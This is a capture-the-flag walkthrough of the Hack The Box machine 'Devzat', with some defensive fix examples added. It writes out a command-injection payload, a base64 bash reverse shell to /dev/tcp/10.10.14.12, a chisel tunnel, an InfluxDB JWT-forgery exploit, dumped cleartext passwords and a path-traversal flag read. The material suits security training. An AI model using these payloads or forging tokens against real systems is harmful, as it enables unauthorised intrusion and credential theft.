Hack-The-Box-walkthrough[devzat]

Introduction

OS: Linux
Difficulty: Medium
Points: 30
Release: 16 Oct 2021
IP: 10.10.11.118


Enumeration

Nmap

┌──(root💀kali)-[~/hackthebox/machine/devzat]
└─# nmap -sV -v -p- --min-rate=10000 10.10.11.118
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41
8000/tcp open ssh (protocol 2.0)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8000-TCP:V=7.91%I=7%D=10/19%Time=616EC117%P=x86_64-pc-linux-gnu%r(N
SF:ULL,C,"SSH-2\.0-Go\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap finds three open ports: OpenSSH on 22, Apache on 80, and a second SSH server on 8000 whose banner is `SSH-2.0-Go`, i.e. a Go-based SSH service rather than OpenSSH. Port 80 also gives away the hostname devzat.htb; add it to /etc/hosts and browse to the site.

Devzat is a chat application for developers that is served over SSH, which explains the Go SSH banner on port 8000.

  • devzat

Let’s access the chat.

┌──(root💀kali)-[~/hackthebox/machine/devzat]
└─# ssh -l test devzat.htb -p 8000
The authenticity of host '[devzat.htb]:8000 ([10.10.11.118]:8000)' can't be established.
RSA key fingerprint is SHA256:f8dMo2xczXRRA43d9weJ7ReJdZqiCxw5vP7XqBaZutI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[devzat.htb]:8000,[10.10.11.118]:8000' (RSA) to the list of known hosts.
2 hours 27 minutes earlier
id
devbot: has left the chat
2 hours 15 minutes earlier
devbot: pets has joined the chat
2 hours 14 minutes earlier
devbot: hoge has joined the chat
2 hours 12 minutes earlier
pets: example-code
2 hours 7 minutes earlier
devbot: pets has left the chat
devbot: pets stayed on for 8 minutes
1 hour 8 minutes earlier
devbot: hoge has left the chat
devbot: hoge stayed on for 1 hour 6 minutes
38 minutes earlier
devbot: You seem to be new here catharine. Welcome to Devzat! Run /help to see what you can do.
devbot: catharine has joined the chat
devbot: catharine has left the chat
devbot: patrick has joined the chat
devbot: patrick has left the chat
devbot: admin has joined the chat
37 minutes earlier
devbot: admin has left the chat
Welcome to the chat. There are no more users
devbot: test has joined the chat
test: /commands
[SYSTEM] Commands
[SYSTEM] clear - Clears your terminal
[SYSTEM] message - Sends a private message to someone
[SYSTEM] users - Gets a list of the active users
[SYSTEM] all - Gets a list of all users who has ever connected
[SYSTEM] exit - Kicks you out of the chat incase your client was bugged
[SYSTEM] bell - Toggles notifications when you get pinged
[SYSTEM] room - Changes which room you are currently in
[SYSTEM] id - Gets the hashed IP of the user
[SYSTEM] commands - Get a list of commands
[SYSTEM] nick - Change your display name
[SYSTEM] color - Change your display name color
[SYSTEM] timezone - Change how you view time
[SYSTEM] emojis - Get a list of emojis you can use
[SYSTEM] help - Get generic info about the server
[SYSTEM] tictactoe - Play tictactoe
[SYSTEM] hangman - Play hangman
[SYSTEM] shrug - Drops a shrug emoji
[SYSTEM] ascii-art - Bob ross with text
[SYSTEM] example-code - Hello world!

None of these commands gives us a foothold on the host. Let’s fuzz for virtual hosts on port 80 instead.

ffuf -c -u http://devzat.htb -H "Host: FUZZ.devzat.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -mc 200

pets [Status: 200, Size: 510, Words: 20, Lines: 21]

One vhost, pets.devzat.htb, comes back. Add it to /etc/hosts and open it.

It is a pet inventory where we can add pets by name and species. Let’s fuzz for directories.

ffuf -u http://pets.devzat.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -fs 510

css [Status: 301, Size: 40, Words: 3, Lines: 3]
build [Status: 301, Size: 42, Words: 3, Lines: 3]
server-status [Status: 403, Size: 280, Words: 20, Lines: 10]
.git [Status: 301, Size: 41, Words: 3, Lines: 3]

The application exposes its `.git` directory. Dump it with GitTools and extract the commits.

┌──(root💀kali)-[~/hackthebox/machine/devzat]
└─# /root/GitTools-master/Dumper/gitdumper.sh http://pets.devzat.htb/.git/ pets
###########
# GitDumper is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########


[*] Destination folder does not exist
[+] Creating pets/.git/
[+] Downloaded: HEAD
[-] Downloaded: objects/info/packs
[+] Downloaded: description
[+] Downloaded: config
[+] Downloaded: COMMIT_EDITMSG
[+] Downloaded: index
[-] Downloaded: packed-refs
[+] Downloaded: refs/heads/master
[-] Downloaded: refs/remotes/origin/HEAD
[-] Downloaded: refs/stash
[+] Downloaded: logs/HEAD
[+] Downloaded: logs/refs/heads/master
[-] Downloaded: logs/refs/remotes/origin/HEAD
[-] Downloaded: info/refs
[+] Downloaded: info/exclude
[-] Downloaded: /refs/wip/index/refs/heads/master
[-] Downloaded: /refs/wip/wtree/refs/heads/master
[+] Downloaded: objects/ef/07a04ebb2fc92cf74a39e0e4b843630666a705
[-] Downloaded: objects/00/00000000000000000000000000000000000000
[+] Downloaded: objects/82/74d7a547c0c3854c074579dfc359664082a8f6
[+] Downloaded: objects/46/4614f32483e1fde60ee53f5d3b4d468d80ff62
[+] Downloaded: objects/55/1abaa3c707703936e5e31b8e4645b35e5f6c07
[+] Downloaded: objects/3a/e86c86b0053b79cdbfc1456d6059986a9d3813
[+] Downloaded: objects/8d/a69971e32e6e08cae489b40731845d1de13258
[+] Downloaded: objects/93/28c7f72254a754c91fddfd3c7e62c1251a2828
[+] Downloaded: objects/2f/37bf8e3a0ce61b74fec752fad017c363511d31
[+] Downloaded: objects/69/f1153887d2790c94f23a00c6f85958cf198418
[+] Downloaded: objects/53/5028803d222b0e4e9174f56529c0ed9fece4e0
[+] Downloaded: objects/54/f95a54c49178dd5d496058e4ee99829748c49a
......
┌──(root💀kali)-[~/hackthebox/machine/devzat/pets]
└─# /root/GitTools-master/Extractor/extractor.sh . pets
###########
# Extractor is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########
[*] Destination folder does not exist
[*] Creating...
[+] Found commit: 8274d7a547c0c3854c074579dfc359664082a8f6
[+] Found file: /root/hackthebox/machine/devzat/pets/pets/0-8274d7a547c0c3854c074579dfc359664082a8f6/.gitignore
[+] Found folder: /root/hackthebox/machine/devzat/pets/pets/0-8274d7a547c0c3854c074579dfc359664082a8f6/characteristics
[+] Found file: /root/hackthebox/machine/devzat/pets/pets/0-8274d7a547c0c3854c074579dfc359664082a8f6/characteristics/bluewhale
[+] Found file: /root/hackthebox/machine/devzat/pets/pets/0-8274d7a547c0c3854c074579dfc359664082a8f6/characteristics/cat
[+] Found file: /root/hackthebox/machine/devzat/pets/pets/0-8274d7a547c0c3854c074579dfc359664082a8f6/characteristics/dog
[+] Found file: /root/hackthebox/machine/devzat/pets/pets/0-8274d7a547c0c3854c074579dfc359664082a8f6/characteristics/giraffe
[+] Found file: /root/hackthebox/machine/devzat/pets/pets/0-8274d7a547c0c3854c074579dfc359664082a8f6/characteristics/gopher
[+] Found file: /root/hackthebox/machine/devzat/pets/pets/0-8274d7a547c0c3854c074579dfc359664082a8f6/characteristics/petshop
[+] Found file: /root/hackthebox/machine/devzat/pets/pets/0-8274d7a547c0c3854c074579dfc359664082a8f6/characteristics/redkite
[+] Found file: /root/hackthebox/machine/devzat/pets/pets/0-8274d7a547c0c3854c074579dfc359664082a8f6/go.mod
[+] Found file: /root/hackthebox/machine/devzat/pets/pets/0-8274d7a547c0c3854c074579dfc359664082a8f6/go.sum
[+] Found file: /root/hackthebox/machine/devzat/pets/pets/0-8274d7a547c0c3854c074579dfc359664082a8f6/main.go
[+] Found file: /root/hackthebox/machine/devzat/pets/pets/0-8274d7a547c0c3854c074579dfc359664082a8f6/petshop
[+] Found file: /root/hackthebox/machine/devzat/pets/pets/0-8274d7a547c0c3854c074579dfc359664082a8f6/start.sh
......

Vulnerability confirmation

We got the source code, let’s dig in.

  • main.go
package main

import (
	"embed"
	"encoding/json"
	"fmt"
	"io/fs"
	"io/ioutil"
	"log"
	"net/http"
	"os/exec"
	"time"
)

//go:embed static/public
var web embed.FS

//go:embed static/public/index.html
var index []byte

type Pet struct {
	Name            string `json:"name"`
	Species         string `json:"species"`
	Characteristics string `json:"characteristics"`
}

var (
	Pets []Pet = []Pet{
		{Name: "Cookie", Species: "cat", Characteristics: loadCharacter("cat")},
		{Name: "Mia", Species: "cat", Characteristics: loadCharacter("cat")},
		{Name: "Chuck", Species: "dog", Characteristics: loadCharacter("dog")},
		{Name: "Balu", Species: "dog", Characteristics: loadCharacter("dog")},
		{Name: "Georg", Species: "gopher", Characteristics: loadCharacter("gopher")},
		{Name: "Gustav", Species: "giraffe", Characteristics: loadCharacter("giraffe")},
		{Name: "Rudi", Species: "redkite", Characteristics: loadCharacter("redkite")},
		{Name: "Bruno", Species: "bluewhale", Characteristics: loadCharacter("bluewhale")},
	}
)

// loadCharacter is the injection sink: species is concatenated into a
// command line that is handed to "sh -c", so shell metacharacters in it
// are interpreted by the shell.
func loadCharacter(species string) string {
	cmd := exec.Command("sh", "-c", "cat characteristics/"+species)
	stdoutStderr, err := cmd.CombinedOutput()
	if err != nil {
		return err.Error()
	}
	return string(stdoutStderr)
}

func getPets(w http.ResponseWriter, r *http.Request) {
	json.NewEncoder(w).Encode(Pets)
}

// addPet decodes the POST body and passes the user-controlled species
// field straight to loadCharacter without any validation.
func addPet(w http.ResponseWriter, r *http.Request) {
	reqBody, _ := ioutil.ReadAll(r.Body)
	var addPet Pet
	err := json.Unmarshal(reqBody, &addPet)
	if err != nil {
		e := fmt.Sprintf("There has been an error: %+v", err)
		http.Error(w, e, http.StatusBadRequest)
		return
	}

	addPet.Characteristics = loadCharacter(addPet.Species)
	Pets = append(Pets, addPet)

	w.WriteHeader(http.StatusOK)
	fmt.Fprint(w, "Pet was added successfully")
}

func handleRequest() {
	build, err := fs.Sub(web, "static/public/build")
	if err != nil {
		panic(err)
	}

	css, err := fs.Sub(web, "static/public/css")
	if err != nil {
		panic(err)
	}

	spaHandler := http.HandlerFunc(spaHandlerFunc)
	// Single page application handler
	http.Handle("/", headerMiddleware(spaHandler))

	// All static folder handler
	http.Handle("/build/", headerMiddleware(http.StripPrefix("/build", http.FileServer(http.FS(build)))))
	http.Handle("/css/", headerMiddleware(http.StripPrefix("/css", http.FileServer(http.FS(css)))))
	// The repository itself is served, which is how we obtained this source.
	http.Handle("/.git/", headerMiddleware(http.StripPrefix("/.git", http.FileServer(http.Dir(".git")))))

	// API routes
	apiHandler := http.HandlerFunc(petHandler)
	http.Handle("/api/pet", headerMiddleware(apiHandler))
	log.Fatal(http.ListenAndServe("127.0.0.1:5000", nil))
}

func spaHandlerFunc(w http.ResponseWriter, r *http.Request) {
	w.WriteHeader(http.StatusOK)
	w.Write(index)
}

func petHandler(w http.ResponseWriter, r *http.Request) {
	// Dispatch by method
	if r.Method == http.MethodPost {
		addPet(w, r)
	} else if r.Method == http.MethodGet {
		getPets(w, r)

	} else {
		http.Error(w, "Method not allowed", http.StatusMethodNotAllowed)
	}
	// TODO: Add Update and Delete
}

func headerMiddleware(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		w.Header().Add("Server", "My genious go pet server")
		next.ServeHTTP(w, r)
	})
}

func main() {
	resetTicker := time.NewTicker(5 * time.Second)
	done := make(chan bool)

	go func() {
		for {
			select {
			case <-done:
				return
			case <-resetTicker.C:
				// Reset Pets to prestaged ones
				Pets = []Pet{
					{Name: "Cookie", Species: "cat", Characteristics: loadCharacter("cat")},
					{Name: "Mia", Species: "cat", Characteristics: loadCharacter("cat")},
					{Name: "Chuck", Species: "dog", Characteristics: loadCharacter("dog")},
					{Name: "Balu", Species: "dog", Characteristics: loadCharacter("dog")},
					{Name: "Georg", Species: "gopher", Characteristics: loadCharacter("gopher")},
					{Name: "Gustav", Species: "giraffe", Characteristics: loadCharacter("giraffe")},
					{Name: "Rudi", Species: "redkite", Characteristics: loadCharacter("redkite")},
					{Name: "Bruno", Species: "bluewhale", Characteristics: loadCharacter("bluewhale")},
				}

			}
		}
	}()

	handleRequest()

	time.Sleep(500 * time.Millisecond)
	resetTicker.Stop()
	done <- true
}

loadCharacter builds a shell command by string concatenation (`sh -c "cat characteristics/" + species`) and addPet feeds it the species field straight from the JSON body, so the species value is an OS command injection sink. Add a pet through the UI and intercept the POST with Burp.
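The fix is to stop the value from ever reaching a shell. The following is an added example, not code from the pets application: it allowlists the species name and reads the file directly, with an argv-only subprocess variant for cases where a subprocess is genuinely wanted. The temporary directory and the `purrs` file are constructed fixtures.

```go
package main

import (
	"fmt"
	"os"
	"os/exec"
	"path/filepath"
	"regexp"
)

// speciesRe is the allowlist: the characteristics files are named with
// lowercase letters only, so anything else is rejected before it reaches
// the filesystem or a process. ';', '|', '$', '/', '.' and whitespace all fail.
var speciesRe = regexp.MustCompile(`^[a-z]{1,32}$`)

func validateSpecies(species string) error {
	if !speciesRe.MatchString(species) {
		return fmt.Errorf("invalid species %q", species)
	}
	return nil
}

// loadCharacterSafe replaces the page's loadCharacter: no shell is involved,
// the file is read directly, and the name has already been allowlisted.
// baseDir is the directory that contains characteristics/.
func loadCharacterSafe(baseDir, species string) (string, error) {
	if err := validateSpecies(species); err != nil {
		return "", err
	}
	data, err := os.ReadFile(filepath.Join(baseDir, "characteristics", species))
	if err != nil {
		return "", err
	}
	return string(data), nil
}

// loadCharacterArgv is the minimal fix if a subprocess is really wanted:
// the path is a separate argv element, so no shell parses it and ';' would
// just be part of a (non-existent) file name. The allowlist still applies.
func loadCharacterArgv(baseDir, species string) (string, error) {
	if err := validateSpecies(species); err != nil {
		return "", err
	}
	out, err := exec.Command("cat", filepath.Join(baseDir, "characteristics", species)).Output()
	if err != nil {
		return "", err
	}
	return string(out), nil
}

func main() {
	// Constructed fixture: a temporary pets directory with one species file.
	dir, err := os.MkdirTemp("", "pets")
	if err != nil {
		panic(err)
	}
	defer os.RemoveAll(dir)
	_ = os.MkdirAll(filepath.Join(dir, "characteristics"), 0o755)
	_ = os.WriteFile(filepath.Join(dir, "characteristics", "cat"), []byte("purrs\n"), 0o644)

	// The second input is the exact payload used against the box.
	for _, s := range []string{"cat", "cat;ping -c 4 10.10.14.12", "../go.mod"} {
		out, err := loadCharacterSafe(dir, s)
		fmt.Printf("%-28q -> out=%q err=%v\n", s, out, err)
	}
}
```

The allowlist is the important part: switching from `sh -c` to an argv call removes the shell, but without the name check a `..` in species would still turn the call into a file read of the attacker's choosing.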

First confirm execution out-of-band with a ping back to our machine. Start tcpdump on tun0 before forwarding the request.

POST /api/pet HTTP/1.1
Host: pets.devzat.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://pets.devzat.htb/
Content-Type: text/plain;charset=UTF-8
Origin: http://pets.devzat.htb
Content-Length: 53
Connection: close


{"name":"luci","species":"cat;ping -c 4 10.10.14.12"}

Forward the request and check tcpdump.

┌──(root💀kali)-[~/hackthebox/machine/devzat]
└─# tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
09:46:30.479050 IP devzat.htb > 10.10.14.12: ICMP echo request, id 2, seq 1, length 64
09:46:30.479081 IP 10.10.14.12 > devzat.htb: ICMP echo reply, id 2, seq 1, length 64
09:46:31.381887 IP devzat.htb > 10.10.14.12: ICMP echo request, id 2, seq 2, length 64
09:46:31.381909 IP 10.10.14.12 > devzat.htb: ICMP echo reply, id 2, seq 2, length 64
09:46:32.286606 IP devzat.htb > 10.10.14.12: ICMP echo request, id 2, seq 3, length 64
09:46:32.286624 IP 10.10.14.12 > devzat.htb: ICMP echo reply, id 2, seq 3, length 64
09:46:33.196134 IP devzat.htb > 10.10.14.12: ICMP echo request, id 2, seq 4, length 64
09:46:33.196149 IP 10.10.14.12 > devzat.htb: ICMP echo reply, id 2, seq 4, length 64

Four echo requests arrive from the target, so the injection executes. Now use it for a reverse shell: base64-encode a bash one-liner so the payload contains no quotes, slashes or redirections that JSON or the shell would mangle, and send it the same way.

┌──(root💀kali)-[~/hackthebox/machine/devzat]
└─# echo -n 'bash -i >& /dev/tcp/10.10.14.12/9001 0>&1' | base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xMi85MDAxIDA+JjE=
  • payload:
cat;echo -n YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xMi85MDAxIDA+JjE= | base64 -d | bash

Catch the shell on the listener, upgrade it to a full TTY, then run linpeas.

┌──(root💀kali)-[~/hackthebox/machine/devzat]
└─# nc -lvp 9001
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.11.118.
Ncat: Connection from 10.10.11.118:50764.
bash: cannot set terminal process group (846): Inappropriate ioctl for device
bash: no job control in this shell
patrick@devzat:~/pets$ id
id
uid=1000(patrick) gid=1000(patrick) groups=1000(patrick)
patrick@devzat:~/pets$ whoami
whoami
patrick
patrick@devzat:~/pets$ python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z

$ stty raw -echo
$ fg

$ reset
$ screen
patrick@devzat:~$ find / -name "user.txt" 2>/dev/null
/home/catherine/user.txt
patrick@devzat:~$ cat /home/catherine/user.txt
cat: /home/catherine/user.txt: Permission denied

In the linpeas process list one entry stands out: a docker-proxy publishing a container port only on 127.0.0.1:8086.

root 1229 0.0 0.1 550720 3856 ? Sl Oct16 0:00 _ /usr/bin/docker-proxy-proto tcp -host-ip 127.0.0.1 -host-port 8086 -container-ip 172.17.0.2 -container-port 8086

Forward that port to the Kali box with a chisel reverse tunnel.

  • on the Kali machine
┌──(root💀kali)-[~/hackthebox/machine/devzat]
└─# ./chisel server -p 8000 --reverse
2021/10/19 09:57:19 server: Reverse tunnelling enabled
2021/10/19 09:57:19 server: Fingerprint 3b:f7:31:4d:44:c5:fa:8a:b8:e7:c3:37:bb:0d:40:5f
2021/10/19 09:57:19 server: Listening on http://0.0.0.0:8000
  • on the target machine
patrick@devzat:/tmp$ wget 10.10.14.12/chisel
--2021-10-19 14:01:09-- http://10.10.14.12/chisel
Connecting to 10.10.14.12:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8687616 (8.3M) [application/octet-stream]
Saving to: ‘chisel’

chisel 100%[===================>] 8.29M 481KB/s in 20s

2021-10-19 14:01:30 (415 KB/s) - ‘chisel’ saved [8687616/8687616]

patrick@devzat:/tmp$ chmod 777 chisel
patrick@devzat:/tmp$ ./chisel client 10.10.14.12:8000 R:8086:127.0.0.1:8086 &
[1] 76754
patrick@devzat:/tmp$ 2021/10/19 14:01:46 client: Connecting to ws://10.10.14.12:8000
2021/10/19 14:01:47 client: Fingerprint 3b:f7:31:4d:44:c5:fa:8a:b8:e7:c3:37:bb:0d:40:5f
2021/10/19 14:01:48 client: Connected (Latency 199.990409ms)

Get user

Run service detection against the forwarded port.

┌──(root💀kali)-[~/hackthebox/machine/devzat]
└─# nmap -p 8086 -sV 127.0.0.1
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-19 10:02 EDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000058s latency).

PORT STATE SERVICE VERSION
8086/tcp open http InfluxDB http admin 1.7.5

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.94 seconds

InfluxDB 1.7.5 is running inside the container. Let’s check that version for known vulnerabilities.

  • InfluxDB 1.7 release notes InfluxDB OSS 1.7 Documentation

TL;DR

InfluxDB before 1.7.6 lets an unauthenticated remote attacker bypass authentication: the authenticate function in services/httpd/handler.go validates JWT bearer tokens against a shared secret that may be empty, so a token signed with an empty secret (carrying the username of an existing account) is accepted and grants that account’s access.
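What the bypass actually sends, as an added example rather than code from the walkthrough or the PoC linked below: InfluxDB 1.x accepts `Authorization: Bearer <JWT>` with an HS256 token whose `username` and `exp` claims are checked against the configured shared secret, so the forgery is an HMAC over the two encoded segments with an empty key. The host 127.0.0.1:8086 and database name `devzat` below are taken from this box; the code only builds the request and does not send it.

```go
package main

import (
	"crypto/hmac"
	"crypto/sha256"
	"encoding/base64"
	"encoding/json"
	"fmt"
	"net/http"
	"net/url"
	"strings"
	"time"
)

func b64url(b []byte) string {
	return base64.RawURLEncoding.EncodeToString(b)
}

// forgeToken builds header.payload.signature with HMAC-SHA256 over the
// first two segments. secret is the server's shared secret; for the
// CVE-2019-20933 bypass it is the empty string.
func forgeToken(username string, exp time.Time, secret []byte) (string, error) {
	header, err := json.Marshal(map[string]string{"alg": "HS256", "typ": "JWT"})
	if err != nil {
		return "", err
	}
	payload, err := json.Marshal(map[string]interface{}{"username": username, "exp": exp.Unix()})
	if err != nil {
		return "", err
	}
	signingInput := b64url(header) + "." + b64url(payload)
	mac := hmac.New(sha256.New, secret)
	mac.Write([]byte(signingInput))
	return signingInput + "." + b64url(mac.Sum(nil)), nil
}

// verifyToken is the signature check an HS256 verifier performs. It is here
// to show that the forged token passes only when the secret is empty.
func verifyToken(token string, secret []byte) bool {
	parts := strings.Split(token, ".")
	if len(parts) != 3 {
		return false
	}
	mac := hmac.New(sha256.New, secret)
	mac.Write([]byte(parts[0] + "." + parts[1]))
	want := b64url(mac.Sum(nil))
	return hmac.Equal([]byte(want), []byte(parts[2]))
}

// queryRequest prepares the /query call that the bypass is used for.
func queryRequest(base, token, db, q string) (*http.Request, error) {
	params := url.Values{"db": {db}, "q": {q}}
	req, err := http.NewRequest("GET", base+"/query?"+params.Encode(), nil)
	if err != nil {
		return nil, err
	}
	req.Header.Set("Authorization", "Bearer "+token)
	return req, nil
}

func main() {
	// The username must exist on the server; the PoC brute-forces it.
	tok, err := forgeToken("admin", time.Now().Add(time.Hour), []byte(""))
	if err != nil {
		panic(err)
	}
	fmt.Println("token:", tok)
	fmt.Println("validates with empty secret:", verifyToken(tok, []byte("")))
	fmt.Println("validates with a real secret:", verifyToken(tok, []byte("correct-horse")))
	req, _ := queryRequest("http://127.0.0.1:8086", tok, "devzat", `SELECT * FROM "user"`)
	fmt.Println(req.Method, req.URL.String())
	// Sending req with http.DefaultClient.Do is left out; it only succeeds
	// against a vulnerable server reachable at that address.
}
```

The username brute-force in the PoC exists because the server looks the claim up in its user list before granting access; an empty secret alone is not enough without a valid account name.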

  • When all else fails - find a 0-day

You can forge the token by hand following the blog above, or use the PoC below, which also brute-forces a valid username, since the token’s username claim must match an existing InfluxDB user.

  • InfluxDB Exploit CVE-2019-20933
┌──(root💀kali)-[~/hackthebox/machine/devzat]
└─# python3 /root/InfluxDB-Exploit-CVE-2019-20933/__main__.py
_____ __ _ _____ ____ ______ _ _ _
|_ _| / _| | | __ \| _ \ | ____| | | (_) |
| | _ __ | |_| |_ ___ __ | | | |_) | | |__ __ ___ __ | | ___ _| |_
| | | '_ \| _| | | | \ \/ / | | | _ < | __| \ \/ / '_ \| |/ _ \| | __|
_| |_| | | | | | | |_| |> <| |__| | |_) | | |____ > <| |_) | | (_) | | |_
|_____|_| |_|_| |_|\__,_/_/\_\_____/|____/ |______/_/\_\ .__/|_|\___/|_|\__|
| |
|_|
CVE-2019-20933

Insert ip host (default localhost):
Insert port (default 8086):
Insert influxdb user (wordlist path to bruteforce username): /usr/share/seclists/Usernames/Names/names.txt

Start username bruteforce
[x] aaliyah
[x] aaren
[x] aarika
[x] aaron
[x] aartjan
[x] aarushi
[x] abagael
[x] abagail
[x] abahri
[x] abbas
[x] abbe
[x] abbey
[x] abbi
[x] abbie
[x] abby
[x] abbye
[x] abdalla
[x] abdallah
[x] abdul
[x] abdullah
[x] abe
[x] abel
[x] abi
[x] abia
[x] abigael
[x] abigail
[x] abigale
......
Host vulnerable !!!
Databases list:

1) devzat
2) _internal

Insert database name (exit to close): devzat
[devzat] Insert query (exit to change db): SELECT * FROM "user"
{
"results": [
{
"series": [
{
"columns": [
"time",
"enabled",
"password",
"username"
],
"name": "user",
"values": [
[
"2021-06-22T20:04:16.313965493Z",
false,
"WillyWonka2021",
"wilhelm"
],
[
"2021-06-22T20:04:16.320782034Z",
true,
"woBeeYareedahc7Oogeephies7Aiseci",
"catherine"
],
[
"2021-06-22T20:04:16.996682002Z",
true,
"RoyalQueenBee$",
"charles"
]
]
}
],
"statement_id": 0
}
]
}

The user table gives us catherine’s InfluxDB password in clear text. It is not accepted over SSH, but it is reused for her local account, so `su` to her from the patrick shell.

patrick@devzat:/tmp$ su catherine
Password:
catherine@devzat:/tmp$ cd ~
catherine@devzat:~$ cat user.txt
9919bf525c5b8306176eaa39e17110d5

Get root

With the user flag in hand, run linpeas again as catherine.

#)You_can_write_even_more_files_inside_last_directory
/var/backups/devzat-dev.zip
/var/backups/devzat-main.zip
/var/crash
/var/tmp

/var/backups holds two zip files that catherine can read. Copy them to /tmp and extract both.

catherine@devzat:/tmp$ unzip devzat-dev.zip
Archive: devzat-dev.zip
creating: dev/
inflating: dev/go.mod
extracting: dev/.gitignore
inflating: dev/util.go
inflating: dev/testfile.txt
inflating: dev/eastereggs.go
inflating: dev/README.md
inflating: dev/games.go
inflating: dev/colors.go
extracting: dev/log.txt
inflating: dev/commands.go
inflating: dev/start.sh
inflating: dev/devchat.go
inflating: dev/LICENSE
inflating: dev/commandhandler.go
inflating: dev/art.txt
inflating: dev/go.sum
extracting: dev/allusers.json
catherine@devzat:/tmp$ unzip devzat-main.zip
Archive: devzat-main.zip
creating: main/
inflating: main/go.mod
extracting: main/.gitignore
inflating: main/util.go
inflating: main/eastereggs.go
inflating: main/README.md
inflating: main/games.go
inflating: main/colors.go
extracting: main/log.txt
inflating: main/commands.go
inflating: main/start.sh
inflating: main/devchat.go
inflating: main/LICENSE
inflating: main/commandhandler.go
inflating: main/art.txt
inflating: main/go.sum
inflating: main/allusers.json

The two trees are almost identical. Diffing commands.go shows what the dev branch adds.

catherine@devzat:/tmp$ diff main/commands.go dev/commands.go
3a4
> "bufio"
4a6,7
> "os"
> "path/filepath"
36a40
> file = commandInfo{"file", "Paste a files content directly to chat [alpha]", fileCommand, 1, false, nil}
38c42,101
< commands = []commandInfo{clear, message, users, all, exit, bell, room, kick, id, _commands, nick, color, timezone, emojis, help, tictactoe, hangman, shrug, asciiArt, exampleCode}
---
> commands = []commandInfo{clear, message, users, all, exit, bell, room, kick, id, _commands, nick, color, timezone, emojis, help, tictactoe, hangman, shrug, asciiArt, exampleCode, file}
> }
>
> func fileCommand(u *user, args []string) {
> if len(args) < 1 {
> u.system("Please provide file to print and the password")
> return
> }
>
> if len(args) < 2 {
> u.system("You need to provide the correct password to use this function")
> return
> }
>
> path := args[0]
> pass := args[1]
>
> // Check my secure password
> if pass != "CeilingCatStillAThingIn2021?" {
> u.system("You did provide the wrong password")
> return
> }
>
> // Get CWD
> cwd, err := os.Getwd()
> if err != nil {
> u.system(err.Error())
> }
>
> // Construct path to print
> printPath := filepath.Join(cwd, path)
>
> // Check if file exists
> if _, err := os.Stat(printPath); err == nil {
> // exists, print
> file, err := os.Open(printPath)
> if err != nil {
> u.system(fmt.Sprintf("Something went wrong opening the file: %+v", err.Error()))
> return
> }
> defer file.Close()
>
> scanner := bufio.NewScanner(file)
> for scanner.Scan() {
> u.system(scanner.Text())
> }
>
> if err := scanner.Err(); err != nil {
> u.system(fmt.Sprintf("Something went wrong printing the file: %+v", err.Error()))
> }
>
> return
>
> } else if os.IsNotExist(err) {
> // does not exist, print error
> u.system(fmt.Sprintf("The requested file @ %+v does not exist!", printPath))
> return
> }
> // bokred?
> u.system("Something went badly wrong.")
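Review bot: fileCommand (hunk 38c42,101) builds printPath with filepath.Join(cwd, path) and then goes straight to os.Stat and os.Open with no check that the result is still under cwd, so a path starting with ../ reads any file the process can open; reject the request unless filepath.Rel(cwd, printPath) stays inside cwd (no leading ..), and do so before the Stat. Two smaller points in the same hunk: the password check compares against the literal "CeilingCatStillAThingIn2021?", which ships the secret with every copy of the source (and this backup), so load it from configuration and compare with a constant-time function; and when os.Getwd fails the code reports the error but falls through and keeps using an empty cwd, where it should return.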

The dev build adds a /file command that prints a file’s contents into the chat. It requires a password, but the password is hardcoded in the source. The path is joined onto the process’s working directory with filepath.Join and never checked for traversal, so `../` walks out of that directory. This build is not the instance on port 8000; it listens on localhost port 8443, and it runs with enough privilege to read /root and /etc/shadow. Connect to it from the catherine shell and read the root flag.
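To make the traversal concrete, the following added example (not part of the devzat code base) reproduces the path handling from fileCommand beside a version that confines reads to the working directory, including the symlink case the plain string check misses. The working directory /root/devzat used in main is constructed from the error messages in the chat log below; the temporary files are fixtures.

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

var errOutsideRoot = errors.New("path escapes the allowed directory")

// joinVulnerable is what fileCommand does: filepath.Join cleans the result,
// but ".." segments in path are resolved against cwd rather than rejected,
// so "../root.txt" becomes "/root/root.txt".
func joinVulnerable(cwd, path string) string {
	return filepath.Join(cwd, path)
}

// within reports whether p is root itself or a descendant of it.
// filepath.Rel yields ".." or a "../" prefix exactly when p lies outside.
func within(root, p string) bool {
	rel, err := filepath.Rel(root, p)
	if err != nil {
		return false
	}
	return rel != ".." && !strings.HasPrefix(rel, ".."+string(filepath.Separator))
}

// joinConfined builds the same path as fileCommand but refuses any result
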